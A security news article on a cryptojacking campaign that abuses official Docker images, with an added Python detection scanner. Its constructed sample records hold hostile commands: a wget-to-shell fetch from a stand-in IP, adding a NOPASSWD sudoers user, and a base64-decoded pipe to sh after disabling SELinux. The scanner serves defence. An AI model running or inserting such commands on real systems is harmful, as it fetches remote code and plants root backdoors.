An active crypto mining campaign has refined its methods to evade detection, new research disclosed today.
The campaign was first uncovered in 2019, and a total of 84 attacks against honeypot servers have been logged since then, four of them in 2021, report researchers at DevSecOps and cloud security firm Aqua Security. Attacks are nevertheless on the rise: 125 attacks were tracked in Q3 2021.
The initial attacks involved running a vanilla image, “alpine:latest,” with a malicious command that downloaded a shell script named “autom.sh.”
“Adversaries commonly use vanilla images along with malicious commands to perform their attacks, because most organizations trust the official images and allow their use,” the researchers said in a report shared with The Hacker News. “Over the years, the malicious command that was added to the official image to carry out the attack has barely changed. The main difference is the server from which the shell script autom.sh was downloaded.”
The shell script kicks off the attack sequence, letting the attacker create a new user account named “akay” and elevate it to root privileges. The attacker can then execute arbitrary commands on the compromised machine to mine cryptocurrency.
The campaign’s earlier 2019 version made no attempt to camouflage the mining activity, but later versions show the developers’ progress in evading detection. One feature that stands out is the disabling of security mechanisms, followed by the retrieval of an obfuscated, Base64-encoded mining shell script.
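The chain described above (a trusted official image started with a command that fetches and runs a script, adds a local user, grants it root, disables security controls, or decodes a Base64 blob straight into a shell) is easy to hunt for in container metadata. The following is an added example written for this page, not Aqua Security's detection logic or any code from the campaign. It applies a handful of regex indicators to docker-inspect-style records; the container records, the image names, the Base64 string and the 203.0.113.10 address are constructed for the example.

```python
"""Heuristic scan of container records for the vanilla-image abuse pattern.

Added example, not Aqua Security's or the campaign's code. Input records
mirror the shape of `docker inspect` output (Id, Config.Image, Config.Cmd,
Config.Entrypoint); the sample records below are constructed.
"""
import re
from dataclasses import dataclass, field

# Each indicator is a regex applied to the flattened container command line.
INDICATORS = {
    "download_and_execute": re.compile(
        r"\b(curl|wget)\b[^|;&]*\|\s*(ba)?sh\b"                           # wget -qO- URL | sh
        r"|\b(curl|wget)\b[^;&]*\.sh\b.*\b(sh|bash|chmod\s+\+x)\b"),      # fetch a .sh, then run it
    "base64_decode_to_shell": re.compile(r"base64\s+(-d|--decode)\b[^|]*\|\s*(ba)?sh\b"),
    "local_user_created": re.compile(r"\b(useradd|adduser)\b"),
    "root_privileges_granted": re.compile(
        r"/etc/sudoers|\bNOPASSWD\b|usermod\s+-aG\s+(sudo|wheel)\b|\buid=0\b"),
    "security_control_disabled": re.compile(
        r"setenforce\s+0|\b(ufw|iptables)\s+(disable|-F)\b"
        r"|systemctl\s+(stop|disable)\s+\S*(firewalld|apparmor|auditd)"),
}


def is_official_image(image: str) -> bool:
    """Docker Hub official images have no namespace ('alpine:latest', 'library/alpine')."""
    name = image.split("@", 1)[0]                  # drop any digest
    head, sep, last = name.rpartition("/")
    last = last.split(":", 1)[0]                   # drop the tag from the final component only
    repo = f"{head}/{last}" if sep else last
    for prefix in ("docker.io/library/", "library/"):
        if repo.startswith(prefix):
            repo = repo[len(prefix):]
    return "/" not in repo                         # registry:port/x or user/x are not official


@dataclass
class Finding:
    container_id: str
    image: str
    official_image: bool
    indicators: list = field(default_factory=list)


def analyze_container(record: dict) -> Finding:
    cfg = record.get("Config", {})
    image = cfg.get("Image", "")
    command = " ".join((cfg.get("Entrypoint") or []) + (cfg.get("Cmd") or []))
    hits = [name for name, rx in INDICATORS.items() if rx.search(command)]
    return Finding(record.get("Id", "?")[:12], image, is_official_image(image), hits)


def scan(records):
    """Return a Finding for every container with at least one indicator."""
    return [f for f in map(analyze_container, records) if f.indicators]


def severity(f: Finding) -> str:
    """Trusted image plus a downloaded second stage is the campaign's signature; rank it highest."""
    if f.official_image and "download_and_execute" in f.indicators:
        return "high"
    return "medium" if len(f.indicators) >= 2 else "low"


# Constructed sample records (not real captures). 203.0.113.10 is a TEST-NET address.
SAMPLE_CONTAINERS = [
    {"Id": "3f1a9c0e7b2d4e5f6a7b8c9d0e1f2a3b",          # mimics the described chain
     "Config": {"Image": "alpine:latest",
                "Cmd": ["/bin/sh", "-c",
                        "wget -qO- http://203.0.113.10/autom.sh | sh; "
                        "adduser -D akay; "
                        "echo 'akay ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers"]}},
    {"Id": "9b8c7d6e5f4a3b2c1d0e9f8a7b6c5d4e",          # obfuscated stage, non-official image
     "Config": {"Image": "mycorp/app:1.2",
                "Cmd": ["sh", "-c", "setenforce 0; echo ZWNobyBoaQo= | base64 -d | sh"]}},
    {"Id": "1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d",          # benign use of the same official image
     "Config": {"Image": "alpine:latest",
                "Cmd": ["sh", "-c", "apk add --no-cache curl && curl -sf https://example.com/health"]}},
    {"Id": "abcdef0123456789abcdef0123456789",          # benign long-running container
     "Config": {"Image": "docker.io/library/nginx:1.21", "Cmd": ["nginx", "-g", "daemon off;"]}},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_CONTAINERS):
        print(f"{f.container_id} {f.image:<24} {severity(f):<6} {', '.join(f.indicators)}")
```

Running the block flags the first two constructed containers and leaves the benign ones alone; the official-image check matters because, as the report notes, a trusted base image by itself will not trip anything, so the signal has to come from what the container is told to do. In practice the records would come from `docker inspect` or a runtime sensor, and the regexes should be treated as a starting point that needs tuning against your own image usage.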
Malware campaigns that hijack computers to mine cryptocurrency have been run by multiple threat actors, such as Kinsing, which has been found scanning the internet for misconfigured Docker servers in order to break into unprotected hosts and install a previously undocumented coin miner strain.
“Miners are a low-risk way for cybercriminals to turn a vulnerability into digital cash, with the greatest risk to their cash flow being competing miners discovering the same vulnerable servers,” Sophos senior threat researcher Sean Gallagher noted in an analysis of a Tor2Mine mining campaign, which involves the use of a PowerShell script to disable malware protection, execute a miner payload, and harvest Windows credentials.
In recent weeks, security flaws in the Log4j logging library, as well as vulnerabilities newly uncovered in Atlassian Confluence, F5 BIG-IP, VMware vCenter, and Oracle WebLogic Servers, have been exploited to hijack machines to mine cryptocurrencies, a scheme known as cryptojacking.